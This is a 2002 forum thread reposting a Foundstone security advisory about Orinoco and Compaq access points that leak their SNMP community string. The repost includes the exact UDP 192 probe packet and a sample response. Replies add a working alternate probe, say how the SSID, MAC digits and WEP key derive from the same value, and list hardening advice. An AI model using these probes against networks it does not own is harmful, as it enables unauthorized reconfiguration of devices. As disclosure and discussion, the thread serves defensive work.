|
|
|||||||
| Register | Search | Today's Posts | Mark Forums Read |
 |
|
|
LinkBack | Thread Tools | Display Modes |
08-09-2002
|
#1 (permalink) |
|
Welcome to my nightmare
Join Date: May 2002
Location: r00ting y0ur b0x.
Posts: 352
|
Foundstone Labs Advisory - Information Leakage in Orinoco and Compaq Access Points
Foundstone Labs Advisory - 080902-APIL
Advisory Name: Information Leakage in Orinoco and Compaq Access Points Release Date: August 9th, 2002 Application: Orinoco Residential Gateway and Compaq WL310 Platforms: N/A Severity: The ability to display/modify configuration information Vendors: Orinoco (http://www.orinocowireless.com) and Compaq (http://www.compaq.com) Authors: Marshall Beddoe (marshall.beddoe@foundstone.com) Tony Bettini (tony.bettini@foundstone.com) CVE Candidate: CAN-2002-0812 Reference: http://www.foundstone.com/advisories Overview: An information leakage vulnerability exists in Orinoco and Compaq OEM access points, disclosing the unique SNMP community string. As a result, an attacker can query the community string and gain the ability to change system configuration including Wired Equivalent Privacy (WEP) keys and Domain Name Service (DNS) information. Detailed Description: The Compaq WL310 is an OEM Orinoco Residential Gateway access point. Both the Compaq and Orinoco access points use a unique identification number found on the bottom of the access point for configuration through their management client. This identification string is used as the default SNMP read/write community string. The community strings appears to be unchangable, unique, and not easily guessable. By sending a specific packet to UDP port 192, the access point will return information including the firmware version and the unique identification value. The packet returned includes the value of system.sysName.0, which in the case of the Compaq WL310 and Orinoco Residential Gateway, includes the unique identification value. The identification value can then be used as the SNMP community string to view and modify the configuration. The probe packet: "\x01\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00" Example probe response: 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 00 00 00 00 00 60 1d 20 2e 38 00 00 18 19 10 f8 | .....`. .8...... 4f 52 69 4e 4f 43 4f 20 52 47 2d 31 31 30 30 20 | ORiNOCO RG-1100 30 33 39 32 61 30 00 00 00 00 00 00 00 00 00 00 | 0392a0.......... 02 8f 24 02 52 47 2d 31 31 30 30 20 56 33 2e 38 | ..$.RG-1100 V3.8 33 20 53 4e 2d 30 32 55 54 30 38 32 33 32 33 34 | 3 SN-02UT0823234 32 20 56 00 | 2 V. system.sysName.0 = "ORiNOCO RG-1100 0392a0" Community name: 0392a0 Vendor Response: Both vendors were notified of this issue on July 8th, 2002. According to Orinoco, "The Residential Gateway line has been discontinued." Solution: Employ packet filtering on inbound requests to deny access to ports 192/udp and 161/udp on the access point. FoundScan has been updated to check for this vulnerability. For more information on FoundScan, see the Foundstone website: http://www.foundstone.com Disclaimer: The information contained in this advisory is copyright (c) 2002 Foundstone, Inc. and is believed to be accurate at the time of publishing, but no representation of any warranty is given, express, or implied as to its accuracy or completeness. In no event shall the author or Foundstone be liable for any direct, indirect, incidental, special, exemplary or consequential damages resulting from the use or misuse of this information. This advisory may be redistributed, provided that no fee is assigned and that the advisory is not modified in any way.
__________________
g0tr00t "Its all fun and games until someone gets killed." |
|
|
|
08-09-2002
|
#2 (permalink) |
|
Registered Member
Join Date: Jul 2002
Location: Ohio - The armpit of it all
Posts: 138
|
Re: Foundstone Labs Advisory - Information Leakage in Orinoco and Compaq Access Points
Good info, but that's assuming that the soho user has actually installed or configured some sort of security on the ap...
I am still amazed that most people, at the very least, don't even bother to password protect their ap's... oh well... I'm preaching to the choir
__________________
BWS Technology is NO PLACE FOR WHIMPS |
|
|
|
|
08-09-2002
|
#3 (permalink) | |
|
Do I look like I'm joking
Join Date: Apr 2002
Location: SoCal, OC
Posts: 4,507
|
Re: Re: Foundstone Labs Advisory - Information Leakage in Orinoco and Compaq Access Points
Quote:
__________________
-=BW=- |
|
|
|
|
|
08-09-2002
|
#5 (permalink) |
|
Registered Member
Join Date: Apr 2002
Posts: 37
|
Easier than that.
The security on the RG units was horrible.
That community name is also the SSID, The last 6 digits of the MAC address of the wireless card, and the last 5 digits are used as a 64bit ascii wep key. To make things worse the RG manager wouldn't let you make any changes. On the plus side the AP manager can configure the RG units. I'll have to play around with my locked down RG unit and check my RG-1000s running the AP-1000 and AP-500 firmware to see if they give away any valuable information. HcRUL |
|
|
|
|
08-09-2002
|
#6 (permalink) | |
|
Registered Member
Join Date: Jul 2002
Location: Ohio - The armpit of it all
Posts: 138
|
Re: Easier than that.
Quote:
Personally, I think the whole damn lot should be lined up and shot. but hey, that's just my opinion. So, on our wall of idiots, we've got a dead heat for last place: Lawyers Used Car Sales folks Pretty much everybody in Congress and Consumer Electronics Sales Pukes.
__________________
BWS Technology is NO PLACE FOR WHIMPS |
|
|
|
|
|
08-10-2002
|
#7 (permalink) | |
|
Squaaawk! WiFi! WiFi!
Join Date: Apr 2002
Location: Tinsel Town
Posts: 1,682
|
Re: Easier than that.
Quote:
__________________
~lincomatic |
|
|
|
|
|
08-10-2002
|
#8 (permalink) |
|
Registered Member
Join Date: Apr 2002
Posts: 37
|
Playing with perl now to test this on a stock RG1000. I cannot get it to reply to their "probe packet" but sending "08010311031503170320" to UDP port 192 I get a reply of the modem connection information.
I am currently using the modem of the RG1000 to dial into the internet and there is no wireless lan. I'll play around with it some more but I don't know how much longer I can stay awake. If I get more info I'll post it here and when I can think clear enough to clean up the code I'll post a perl script to probe the RG. HcRUL |
|
|
|
|
08-10-2002
|
#9 (permalink) |
|
Registered Member
Join Date: Apr 2002
Posts: 37
|
There is no news...
Okay I'm really not impressed. After looking into this I do not see a point to their advisory.
First off their probe packet has an extra byte. That is why it didn't work for me. The only difference between their packet with the correct length and the standard packet sent out by the AP manager is the "07" byte which is "00" from the AP manager. What they are "revealing" is the system name. Unfortunately for the RG the system name contains the "magic" string that was also used for the community name. This flaw can eaisly be corrected by editing the system name with the AP manager to remove the info. The funny thing is that you can get this same information from passive means and there is no need to query the AP. This community name is also the ssid and the last 6 digits of the MAC of the wireless interface on the AP. Netstumbler grabs this same information from 3 places. First in the MAC, then in the SSID, and lastly in the name of the AP. The trick here is not to take the stock configuration period. In the early days you had to could only use the RG config util and you were severly limited in what you could do. It wouldn't let you change the ssid or wep settings. Some time ago they modified the AP manager to allow it to make changes to the RG series and now all this can be changed. Although the recent version of the RG config utility is much better I wouldn't use it and would stick to the AP Manager or Freebase. If you have a RG and want to secure it do the following: Change the ssid, Change the read password, Change the write password, Change the System/AP Name, Turn off beaconing To sum it all up it doesn't expose the community string just the ap name. With the default config these are the same but they can be changed. HcRUL |
|
|
|
|
08-10-2002
|
#10 (permalink) |
|
Squaaawk! WiFi! WiFi!
Join Date: Apr 2002
Location: Tinsel Town
Posts: 1,682
|
yeah, your're right! i was looking again at the info in the initial post. i just wasn't reading the info in BW's initial post correctly yesterday. this is the same probe that NS sends out...i've seen it before. we all know this is how NS does "get AP Name." i've seen it w/ ethereal before. even dlink AP's send out "Prism II."
but the annoying thing is how the RG sends out the model/serial/firmware rev. this is just an invitation for version-specific hacking. kind of like when linux gives out the version & kernel rev in response to a telnet. so the upshot is if one runs AP manager, everything is relatively safe. good work, HcRul.
__________________
~lincomatic |
|
|
|
Linear Mode
